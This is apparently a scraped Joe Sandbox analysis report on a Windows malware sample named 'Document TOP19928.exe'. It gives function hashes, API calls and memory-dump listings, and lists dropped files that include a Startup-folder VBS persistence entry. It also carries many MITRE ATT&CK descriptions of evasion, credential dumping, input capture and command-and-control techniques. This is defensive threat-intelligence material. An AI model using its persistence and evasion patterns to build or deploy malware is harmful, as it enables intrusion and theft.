String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 54a7e7c751ce3414ebfc555585a69adeee6e594c43c4d757817dc9d49d5e3ac1
Instruction ID: e5b82305b05e8046be24c28511fd626f0cf6e894714cf57cc1516f23105baa80
Opcode Fuzzy Hash: 54a7e7c751ce3414ebfc555585a69adeee6e594c43c4d757817dc9d49d5e3ac1
Instruction Fuzzy Hash: 3DE06DB02007118BD760DF68DC083427BE0FB00745F04896DE546C37A2E7B8D444CBA1

Function 00855BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00855BF5
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00855C08

Part of subcall function 008354E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0083555E

Strings

Shell_TrayWnd, xrefs: 00855BEE

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 9fefca78bc04e45c243d3ea458b538277c118a4736220e60906f19c004ebd1d4
Instruction ID: 451be0948ddaa6b784fb3a64654ef35a8f646a47418c7d84e22cce1c31df0026
Opcode Fuzzy Hash: 9fefca78bc04e45c243d3ea458b538277c118a4736220e60906f19c004ebd1d4
Instruction Fuzzy Hash: FBD0A931388300B7E368BB30AC0FF932A10FB00B02F000825B306EA1D1D8E85800C680

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Document TOP19928.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\F56GKLK7U4

C:\Users\user\AppData\Local\Temp\aut9C75.tmp

C:\Users\user\AppData\Local\Temp\aut9CA5.tmp

C:\Users\user\AppData\Local\Temp\aut9FD0.tmp

C:\Users\user\AppData\Local\Temp\autA000.tmp

C:\Users\user\AppData\Local\Temp\autD75B.tmp

C:\Users\user\AppData\Local\Temp\autD78B.tmp

C:\Users\user\AppData\Local\Temp\piceworth

C:\Users\user\AppData\Local\Temp\unhelpable

C:\Users\user\AppData\Local\directory\name.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Static File Info

Windows Analysis Report
Document TOP19928.exe

Function 007D3B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 007D3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
timewindowregistryCOMMON

Function 007D4AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 007D4FE9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62
COMMON

Function 009090A0 Relevance: 7.7, APIs: 5, Instructions: 206
librarymemoryloaderCOMMON

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre